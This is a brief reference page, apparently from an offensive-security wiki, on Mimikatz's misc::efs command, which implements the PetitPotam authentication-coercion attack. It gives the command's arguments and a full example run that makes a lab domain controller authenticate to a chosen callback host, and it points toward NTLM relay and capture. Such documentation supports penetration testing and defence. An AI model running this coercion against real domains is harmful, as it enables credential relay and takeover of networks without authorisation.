Links

efs

misc::efs is Mimikatz's implementation of the MS-EFSR abuse (PetitPotam), an authentication coercion technique. It has the following command line arguments:
  • /authuser: the User Principal Name (UPN). By default it uses the current user's token
  • /authpassword: the password of the user.
  • /noauth: use null session
  • /endpoint: the RPC endpoint. By default is uses \pipe\lsarpc
  • /server or /target: the target server
  • /connect or /callback: the unconstrained delegation server, or other host with Responder, etc.
mimikatz # misc::efs /server:dc.hacklab.local /connect:192.168.0.18 /noauth
[auth ] None
[ rpc ] Endpoint: \pipe\lsarpc
[trans] Disconnect eventual IPC: OK
[trans] Connect to IPC: OK
[ rpc ] Resolve Endpoint: OK
Remote server reported bad network path! (OK)
> Server (dc.hacklab.local) may have tried to authenticate (to: 192.168.0.18)
[trans] Disconnect IPC: OK
For more information on how to exploit this, see The Hacker Recipes. It can be used to NTLM relay attacks, NTLM capture, etc.
Last modified 2yr ago